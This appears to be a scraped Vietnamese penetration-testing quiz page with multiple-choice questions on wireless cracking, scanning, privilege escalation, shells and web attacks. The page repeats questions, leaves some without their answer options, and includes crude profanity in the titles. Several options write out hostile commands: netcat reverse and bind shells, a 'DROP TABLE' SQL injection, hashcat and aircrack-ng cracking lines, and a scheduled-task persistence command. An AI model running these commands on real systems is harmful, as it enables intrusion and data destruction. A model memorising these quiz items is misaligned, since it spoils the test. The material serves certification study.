Trong quá tình kiểm thử ứng dụng web, Sam đang tạo 1 payload có nội dung như sau:

Path traversal ( dcm Tú cứ Ba)

Trong quá trình kiểm thử mạng không dây. Tom có thu được 1 số lượng lớn các gói tin handshake. Lệnh nào dưới đây cho phép bẻ khóa PSK dựa trên gói tin handshake thu được sử dụng tập từ điển cho trước?

hashcat -m 2500 WPA.hccapx rockyou.txt

airodump-ng -c 1 --bssid E4:6F:13:04:CE:31 -w rockyou.txt

airmon-ng -w rockyou.txt -b <target MAC> <outfile>

aircrack-ng -w rockyou.txt -b <target MAC> <outfile>

Trong quá trình dò quét nmap, Casey sử dụng cờ -O để xác định thông tin về hệ điều hành của hệ thống. Quá trình dò quét xác điịnh được thông tin về hệ thống như sau

Hệ thống đang chạy Linux 2.6 kernel trong khoảng giữa .9 và .33

Ngày hệ thống được vá lần cuối

Thông tin về các bản vá của Linux kernel đã được cài đặt

Xác định thông tin về bản phân phối Linux (Linux distribution) được cài đặt trên hệ thống

Trong quá trình kiểm thử xâm nhập, Mary thu thập được một số thông tin xác thực cấp thấp cho máy chủ Linux thông qua tấn công kĩ nghệ xã hội. Sau khi kiểm tra và xác minh các thông tin đăng nhập này, Mary bắt đầu tìm kiếm cách thức thực hiện tấn công leo thang đặc quyền và có phát hiện ra thông tin sau:

Quyền truy cập sudo không an toàn

Sử dụng SUID/SGID không an toàn

Mật khẩu được lưu trữ dưới dạng bản rõ

Liam thực hiện kiểm thử cho hệ thống công ty X. Sau khi thực hiện xâm nhập thành công vào hệ thống, cô ấy thực hiện câu lệnh dưới đây trên máy mục tiêu: nc 10.1.10.1 6666 -e /bin/sh Liam đang cố gắng thực hiện việc gì

Khởi đông reverse shell sử dụng Netcat

Không có đáp án nào đúng

Chặn bắt lưu lượng trên cổng 6666 sử dụng netcat

Thiết lập bind shell sử dụng netcat

Đối với kiểm thử xâm nhập được tiến hành từ bên trong mạng nội bộ ( phía sau các giải pháp bảo vệ vành đai như Firewall, IDS/IPS), việc được cung cấp quyền tiếp cận hạn chế có nghĩa gì?

Người kiểm thử chỉ được cung cấp kết nối ban đầu tới các hệ thống đích

Người kiểm thử được cung cấp tài khoản quản trị

Người kiểm thứ sẽ chỉ được kết nối tới hệ thống đích trong một thời gian giới hạn

Việc truy cập mạng vào các hệ thống hoặc mạng đích sẽ chỉ được phép trong những giờ được được xác định được

Khi thực hiện kiểm thử xâm nhập, Charles sử dụng nmap để dò quét hệ thống mục tiêu bằng lệnh sau: nmap -sT -sV -T2 -p 1-65535 example.com Sau khi xem quá trình dò quét chạy trong hơn hai giờ đồng hồ, anh ấy nhận ra rằng mình cần phải tối ưu hóa câu lệnh dò quét. Phương án nào dưới đây KHÔNG phải cách hữu ích để tăng tốc độ quét

Chỉ quét UDP để cải thiện tốc độ

Thay đổi mẫu thời gian từ -T2 sang thành -T3 hoặc -T4

Sử dụng danh sách cổng mặc định

Chuyển sang sử dụng SYN scan

Renee đang tiến hành một cuộc kiểm thử xâm nhập vầ phats hiện ra bằng chứng cho thấy một trong những hệ thống của công ty khách hàng đã bị tấn công. Renee nên làm gì ngay sau khi xác nhận các nghi ngờ của mình?

Báo cáo ngay các thông tin về bằng chứng tấn công cho khách hàng

Không cần thực hiện thêm hành động nào vi phạm vi công việc của Renee chỉ giới hạn trong việc thực hiển kiểm thử

Ghi lại các chi tiết trong báo cáo kiểm thử xâm nhâp

Khắc phục lỗ hổng cho phép Renee có quyền truy cập

Thực hiện tấn công từ chối dịch vụ bằng cách gửi deauthentication frame tới các thiết bị đang kết nối trong mạng không dây

Khôi phục mật khẩu WPA từ WPS PIN

Thiết lập proxy để thực hiên tấn công SSL strip lên các yêu cầu HTTPS

Thu thập thông tin về quá trình bắt tay 4 bước trong mạng không dây

Trong quá trình kiểm thử ứng dụng web, Jack phát hiện ra một số lỗ hổng nghiêm trọng. Anh ấy muốn lợi dụng các lỗ hổng này để tạo một tài khoản trái phép. Những tấn công nào dưới đây có thể được liên kết với nhau để dẫn đến việc tạo thành công tài khoản của Jack?

CSRF, Insecure direct object reference

Code injection, Directory traversal

Insecure direct object reference, Code injection

Khi thực hiện kiểm thử, Peter phát hiện ra có khả năng thực hiện tấn công SQL injection. Khi sử dụng chuỗi lệnh tiêm sau: H51

SELECT * FROM Orders_Pend WHERE Location_City = NY';DROP TABLE Orders_Pend --

WHERE Location_City = NY'1 = 1': DROP_TABLE --

DROP TABLE Orders_Pend WHERE ' NY = 1' --

SELECT * FROM Orders_Pend WHERE ' NY ';DROP_TABLE --

Tom đang thực hiện kiểm thử ứng dụng web cho một ngân hàng sử dụng Nikto. Hiện tại, anh ấy muốn thu thập tất cả các yêu cầu ( request) được tạo ra bởi Nikto sử dụng Burp Suite Proxy trên cổng 8080. Lênh nào dưới đây cho phép anh ấy thực hiện việc này?

./ nikto.pl -host http://vulnweb.app/ -useproxy http://localhost:8080/

./ nikto.pl -host http://vulnweb.app/ -proxy http://localhost:8080/

./ nikto.pl -url http://vulnweb.app/ -proxy http://localhost:8080/

Tú ĐỤ Bài kiểm tra

1.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

Sau một số nỗ lực khai thác lỗi từ một trang web mục tiêu đã tạo ra thông báo lỗi như sau. Mô tả đúng nhất về lỗi

Trang web tồn tại lỗ hổng XSS

Trang web tồn tại lỗ hổng SQL injection

Trang web tồn tại lỗ hổng CSRF

Trang web tồn tại lỗ hổng tràn bộ đệm

2.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

Trong quá trình kiểm thử hệ thống, Peter muốn tiêm shellcode của mình vào một số chương trình hợp lệ trên hệ thống Window như calc.exe, mspaint.exe để kiểm tra khả năng bypass antivirus. Công cụ nào sau đây được phát triển cho mục đích này?

Meterpreter

Powershell

Shellter

Metasploit

3.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

Thuật ngữ nào được sử dụng để môt tả các cuộc tấn công sử dụng kết nối Bluetooth của thiết bị để lấy cắp thông tin?

NFC cloning

Bluesnarfing

BlueBorne

Wardriving

4.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

Công cụ nào dưới đây thường được sử dụng để thu thập một số thông tin về máy chủ & ứng dụng web như Platform, Webserver platform, Server headers, Cookie, Type of Script...?

whatweb

OpenVas

wpscan

w3af

5.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

Sau khi xâm nhập vào một máy chủ từ xa có địa chỉ 102.15.8.13, Cameron thực hiện câu lệnh sau trên máy chủ từ xa: H31
nc -lvp 4444 -e /bin/bash
Trong trường hợp Cameron muốn tạo bind shell, lệnh nào sau đây cần được thực hiện trên máy tính của anh í?

nc 102.15.8.13 4444

nc -e /bin/bash -lvp 4444

nc -lvp 4444 102.15.8.13

nc 102.15.8.13 -e /bin/bash

6.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

Kẻ tấn công lừa người dùng truy cập vào một trang web độc hại thông qua email lừa đảo. Người dùng nhấp vào liên kết email và truy cập trang web độc hại trong khi vẫn duy trì phiên hoạt động được xác thực với ngân hàng của mình. Kẻ tấn công thông qua trang web độc hại đã chỉ thị cho trình duyệt của người dùng gửi yêu cầu đến trang web ngân hàng mà người dùng không hề hay biết. Đây là dạng tấn công nào?

CSRF

Hidden form field

XSS

CSPP( Connection String Parameter Pollution)

7.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

Steve đang tham gia kiểm thử xâm nhập một hệ thống của khách hàng và tiến hành thu thập thông tin mà không cần thực hiện dò quét hoặc thực hiện các tấn công thăm dò mục tiêu. Steve đang sử dụng phương pháp thu thập thông tin nào?

Enumeration

Active

OSINT

Port scanning

8.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

Trong quá trình kiểm thử mạng không dây, Tom thực hiện câu lệnh như hình dưới đây.
root@xali:~# aircrack-ng -b 12:34:56:78:90:AB /tmp/wpa_output*.cap
Mục đích của Tom trong trường hợp này là gì?

Xác định các mạng hỗ trợ WPS

Xác định thông tin về ESSID của AP mà máy nạn nhân đang kết nối

Bẻ khóa WEP dựa trên gói tin thu được

Thu thập mật khẩu truy cập cho bộ định tuyến hỗ trợ WPS sau bẻ khóa WPS PIN

9.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

Jenny thực hiện kiểm thử cho một tổ chức và đã xâm nhập thành công vào một máy chủ Windows. Jenny cố gắng duy trì khả năng kết nối lâu dài tới hệ thống máy tính nạn nhân. Câu lệnh nào dưới đây có khả năng thực hiện việc đó?

net session server | dsquery -user | net use c$

powershell && set-executionpolicy unrestricted

schtasks.exe /create/tr powershell.exe Sv.ps1 /run

req save HKLMSystemCurrentControlSetServicesSv.reg

10.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

Trong quá trình thực hiện kiểm thử, Alice đã thu được NetNTLMv2 hash sử dụng Responder. Lệnh nào dưới đây cho phép người kiểm thử bẻ khóa giá trị hash thu được sử dụng tấn công mặt nạ?

hashcat -m 5600 -r rules/bestG4.rule hash.txt wordlist.txt

hashcat -m 5600 hash.txt

hashcat -m 5600 -o results.text hash.txt wordlist.txt

hashcat -m 5600 -a 3 hash.txt ?a?a?a?a?a?a?a?a

Tú ĐỤ

56 questions

Sau một số nỗ lực khai thác lỗi từ một trang web mục tiêu đã tạo ra thông báo lỗi như sau. Mô tả đúng nhất về lỗi

Trong quá trình kiểm thử hệ thống, Peter muốn tiêm shellcode của mình vào một số chương trình hợp lệ trên hệ thống Window như calc.exe, mspaint.exe để kiểm tra khả năng bypass antivirus. Công cụ nào sau đây được phát triển cho mục đích này?

Thuật ngữ nào được sử dụng để môt tả các cuộc tấn công sử dụng kết nối Bluetooth của thiết bị để lấy cắp thông tin?

Công cụ nào dưới đây thường được sử dụng để thu thập một số thông tin về máy chủ & ứng dụng web như Platform, Webserver platform, Server headers, Cookie, Type of Script...?

Steve đang tham gia kiểm thử xâm nhập một hệ thống của khách hàng và tiến hành thu thập thông tin mà không cần thực hiện dò quét hoặc thực hiện các tấn công thăm dò mục tiêu. Steve đang sử dụng phương pháp thu thập thông tin nào?

Trong quá trình kiểm thử mạng không dây, Tom thực hiện câu lệnh như hình dưới đây.
root@xali:~# aircrack-ng -b 12:34:56:78:90:AB /tmp/wpa_output*.cap
Mục đích của Tom trong trường hợp này là gì?

Jenny thực hiện kiểm thử cho một tổ chức và đã xâm nhập thành công vào một máy chủ Windows. Jenny cố gắng duy trì khả năng kết nối lâu dài tới hệ thống máy tính nạn nhân. Câu lệnh nào dưới đây có khả năng thực hiện việc đó?

Trong quá trình thực hiện kiểm thử, Alice đã thu được NetNTLMv2 hash sử dụng Responder. Lệnh nào dưới đây cho phép người kiểm thử bẻ khóa giá trị hash thu được sử dụng tấn công mặt nạ?

Create a free account and access millions of resources

Popular Resources on Wayground

Discover more resources for Special Education

Tú ĐỤ

56 questions

Sau một số nỗ lực khai thác lỗi từ một trang web mục tiêu đã tạo ra thông báo lỗi như sau. Mô tả đúng nhất về lỗi

Thuật ngữ nào được sử dụng để môt tả các cuộc tấn công sử dụng kết nối Bluetooth của thiết bị để lấy cắp thông tin?

Công cụ nào dưới đây thường được sử dụng để thu thập một số thông tin về máy chủ & ứng dụng web như Platform, Webserver platform, Server headers, Cookie, Type of Script...?

Steve đang tham gia kiểm thử xâm nhập một hệ thống của khách hàng và tiến hành thu thập thông tin mà không cần thực hiện dò quét hoặc thực hiện các tấn công thăm dò mục tiêu. Steve đang sử dụng phương pháp thu thập thông tin nào?

Trong quá trình kiểm thử mạng không dây, Tom thực hiện câu lệnh như hình dưới đây.root@xali:~# aircrack-ng -b 12:34:56:78:90:AB /tmp/wpa_output*.capMục đích của Tom trong trường hợp này là gì?

Jenny thực hiện kiểm thử cho một tổ chức và đã xâm nhập thành công vào một máy chủ Windows. Jenny cố gắng duy trì khả năng kết nối lâu dài tới hệ thống máy tính nạn nhân. Câu lệnh nào dưới đây có khả năng thực hiện việc đó?

Trong quá trình thực hiện kiểm thử, Alice đã thu được NetNTLMv2 hash sử dụng Responder. Lệnh nào dưới đây cho phép người kiểm thử bẻ khóa giá trị hash thu được sử dụng tấn công mặt nạ?

Create a free account and access millions of resources

Popular Resources on Wayground

Discover more resources for Special Education

Trong quá trình kiểm thử mạng không dây, Tom thực hiện câu lệnh như hình dưới đây.
root@xali:~# aircrack-ng -b 12:34:56:78:90:AB /tmp/wpa_output*.cap
Mục đích của Tom trong trường hợp này là gì?